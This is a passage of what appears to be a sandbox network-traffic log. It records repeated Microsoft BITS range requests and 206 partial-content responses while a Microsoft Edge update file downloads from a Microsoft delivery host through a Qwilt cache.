                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=36421063-38646884
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:50:13 GMT
                Content-Type: application/octet-stream
                Content-Length: 2225822
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c921865-2915334016-76
                Ocn-Served-By: QLT
                Content-Range: bytes 36421063-38646884/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=38646885-41718641
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:50:14 GMT
                Content-Type: application/octet-stream
                Content-Length: 3071757
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c92260c-2915334016-77
                Ocn-Served-By: QLT
                Content-Range: bytes 38646885-41718641/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=41718642-43935980
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:50:15 GMT
                Content-Type: application/octet-stream
                Content-Length: 2217339
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c92436b-2915334016-78
                Ocn-Served-By: QLT
                Content-Range: bytes 41718642-43935980/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=43935981-46182223
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:50:16 GMT
                Content-Type: application/octet-stream
                Content-Length: 2246243
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c925e8f-2915334016-79
                Ocn-Served-By: QLT
                Content-Range: bytes 43935981-46182223/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=46182224-47795010
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:50:17 GMT
                Content-Type: application/octet-stream
                Content-Length: 1612787
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c927b60-2915334016-80
                Ocn-Served-By: QLT
                Content-Range: bytes 46182224-47795010/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=47795011-50552160
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:50:19 GMT
                Content-Type: application/octet-stream
                Content-Length: 2757150
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c92aed6-2915334016-81
                Ocn-Served-By: QLT
                Content-Range: bytes 47795011-50552160/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=50552161-54061696
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:50:21 GMT
                Content-Type: application/octet-stream
                Content-Length: 3509536
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c92f2ae-2915334016-82
                Ocn-Served-By: QLT
                Content-Range: bytes 50552161-54061696/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=54061697-55252788
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:50:36 GMT
                Content-Type: application/octet-stream
                Content-Length: 1191092
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c94b55c-2915334016-83
                Ocn-Served-By: QLT
                Content-Range: bytes 54061697-55252788/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=55252789-57069391
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:50:37 GMT
                Content-Type: application/octet-stream
                Content-Length: 1816603
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c94d94e-2915334016-84
                Ocn-Served-By: QLT
                Content-Range: bytes 55252789-57069391/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=57069392-59000041
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:50:39 GMT
                Content-Type: application/octet-stream
                Content-Length: 1930650
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c95158b-2915334016-85
                Ocn-Served-By: QLT
                Content-Range: bytes 57069392-59000041/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=59000042-61833167
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:50:41 GMT
                Content-Type: application/octet-stream
                Content-Length: 2833126
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c958154-2915334016-86
                Ocn-Served-By: QLT
                Content-Range: bytes 59000042-61833167/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=61833168-63697121
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:50:43 GMT
                Content-Type: application/octet-stream
                Content-Length: 1863954
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c95c657-2915334016-87
                Ocn-Served-By: QLT
                Content-Range: bytes 61833168-63697121/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=63697122-65363513
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:50:44 GMT
                Content-Type: application/octet-stream
                Content-Length: 1666392
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c95dfbc-2915334016-88
                Ocn-Served-By: QLT
                Content-Range: bytes 63697122-65363513/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=65363514-69237929
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
